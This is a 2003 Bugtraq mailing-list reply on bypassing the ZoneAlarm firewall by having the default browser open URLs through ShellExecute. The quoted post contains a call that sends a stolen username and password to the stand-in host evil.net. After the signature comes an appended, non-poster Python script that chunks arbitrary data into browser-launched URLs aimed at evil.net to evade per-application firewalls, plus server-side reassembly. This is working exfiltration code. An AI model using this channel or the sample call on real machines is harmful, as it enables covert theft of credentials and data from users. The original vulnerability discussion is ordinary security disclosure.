Re: Bypassing ZoneAlarm (limited)

From: Dan Harkless (bugtraq_at_harkless.org)
Date: 07/03/03

    To: bugtraq@securityfocus.com
    Date: Thu, 03 Jul 2003 11:57:27 -0700
    
    

    While I was being interviewed for an InfoSecurityMag.com article on this (in
    which the author unfortunately got multiple fundamental facts wrong), I
    thought of a couple of other points that are probably worth mentioning.

    <aceh@gyuvetch.bg> writes:
    > Windows DLL shell32.dll exports a well-known and documented function called
    > ShellExecute. From the Win32 Programmer's Reference:
    >
    > >HINSTANCE ShellExecute(
    > > HWND hwnd, // handle to parent window
    > > LPCTSTR lpOperation, // pointer to string that specifies
    > > // operation to perform
    > > LPCTSTR lpFile, // pointer to filename or folder name string
    > > LPCTSTR lpParameters, // pointer to string that specifies
    > > //executable-file parameters
    > > LPCTSTR lpDirectory, // pointer to string that specifies default directory
    > > INT nShowCmd // whether file is shown when opened
    > > );
    >
    > When the lpFile parameter is an Internet url, windows invokes Internet
    > Explorer (or more accurately - the default web browser), which in 99% of
    > the cases is allowed to access Internet, with that url. Example:
    >
    > ShellExecute(
    > 0,
    > "open",
    > "http://evil.net/collect.cgi?un=stolen_username&pw=stolen_password",
    > 0,
    > 0,
    > SW_HIDE //This doesn't work.
    > //I think it is supposed to hide the window but ...
    > );

    The level of detail you're going into on ShellExecute() kind of implies the
    vulnerability is limited to that one system call, but of course a malicious
    executable could directly run iexplore.exe or any other executable that
    allows opening arbitrary URLs, and pass those URLs via the command line or
    via other means like DDE.

    > The info leaked is limited by the maximum allowed url length, but that
    > could be more than enough for a malicious application to send some
    > username/password/cookie/cc_number info to malicious server.

    And the vulnerability wouldn't be limited to simplex communications from
    host to server. The trojan could employ techniques (as simple as reading
    Internet Explorer cache files) to establish half-duplex communications,
    potentially allowing an attacker to gain remote control over your machine
    despite the presence of ZoneAlarm.

    Of course if a trojan is able to run arbitrary commands with your user
    privileges (especially if you're in the Administrators group, as, for
    instance, the initial account created on Windows XP boxes is), there are
    other ways an attacker could gain control of your machine. Particularly if
    you're running only ZoneAlarm rather than ZoneAlarm Plus or Pro, since it
    doesn't notice DLLs getting changed.

    --
    Dan Harkless
    bugtraq@harkless.org
    http://harkless.org/dan/
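Added example (not code from either poster): the URL-length constraint
discussed above, worked through. A payload is base64url-encoded, split into
pieces so that every URL stays within the limit, and handed to the default
browser one URL at a time; the matching server-side function reorders and
decodes the pieces. The base URL http://evil.net/collect.cgi is the one from
the quoted post; the 2083-character limit is an assumption (the commonly cited
Internet Explorer maximum), and the parameter names s/i/n/d are made up here.
On Windows, webbrowser.open() falls back to os.startfile(), which is
ShellExecute() with the "open" verb, so the process that originates the
traffic is the browser and a per-application firewall never sees the caller.

```python
"""Carry arbitrary data over browser-launched URLs (added example).

The 2083-character cap below is an assumption: the usual Internet Explorer
URL limit. The query parameter names are invented for this example.
"""
import base64
import webbrowser
from urllib.parse import parse_qs, urlencode, urlsplit

MAX_URL_LEN = 2083  # assumed IE limit; other browsers allow longer URLs


def _encode_chunk(base, seq, total, session, data):
    # base64url output (A-Z a-z 0-9 - _) is never percent-escaped by
    # urlencode, so the URL length is exactly what we compute here.
    query = urlencode({"s": session, "i": seq, "n": total, "d": data})
    return f"{base}?{query}"


def build_exfil_urls(base, payload, session="demo", max_len=MAX_URL_LEN):
    """Split payload (bytes) into URLs, each no longer than max_len."""
    text = base64.urlsafe_b64encode(payload).decode("ascii").rstrip("=")
    # Worst-case fixed overhead: four-digit sequence counters, empty data.
    overhead = len(_encode_chunk(base, 9999, 9999, session, ""))
    capacity = max_len - overhead
    if capacity <= 0:
        raise ValueError("base URL leaves no room for data")
    chunks = [text[i:i + capacity] for i in range(0, len(text), capacity)] or [""]
    if len(chunks) > 9999:
        raise ValueError("payload too large for four-digit sequence counters")
    total = len(chunks)
    return [_encode_chunk(base, i, total, session, c) for i, c in enumerate(chunks)]


def reassemble(urls):
    """Server-side view: order the received chunks and decode the payload."""
    parts = {}
    total = None
    for u in urls:
        q = parse_qs(urlsplit(u).query)
        i, n = int(q["i"][0]), int(q["n"][0])
        if total is None:
            total = n
        elif total != n:
            raise ValueError("chunk count mismatch between URLs")
        parts[i] = q.get("d", [""])[0]  # parse_qs drops empty values
    if total is None or set(parts) != set(range(total)):
        raise ValueError("missing chunks")
    text = "".join(parts[i] for i in range(total))
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def launch(urls, opener=webbrowser.open):
    """Hand each URL to the default browser; returns how many were accepted.

    On Windows, webbrowser.open() ends up in os.startfile(), i.e.
    ShellExecute(NULL, "open", url, ...): the primitive from the post.
    The opener is injectable so the channel can be exercised without a browser.
    """
    count = 0
    for u in urls:
        if opener(u):
            count += 1
    return count


if __name__ == "__main__":
    # Constructed sample: a credential-like string, as in the quoted example.
    sample = b"un=stolen_username&pw=stolen_password"
    urls = build_exfil_urls("http://evil.net/collect.cgi", sample)
    print(len(urls), "URL(s), longest", max(len(u) for u in urls), "chars")
    print(reassemble(urls) == sample)
```

Nothing about the channel is browser-specific: the same code works with
whatever program the platform associates with http: URLs, which is the point
the reply makes about iexplore.exe and DDE. Each URL is also a complete,
ordinary GET request on the wire, so anything that only counts long query
strings from a single client is the cheapest detection available.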
    
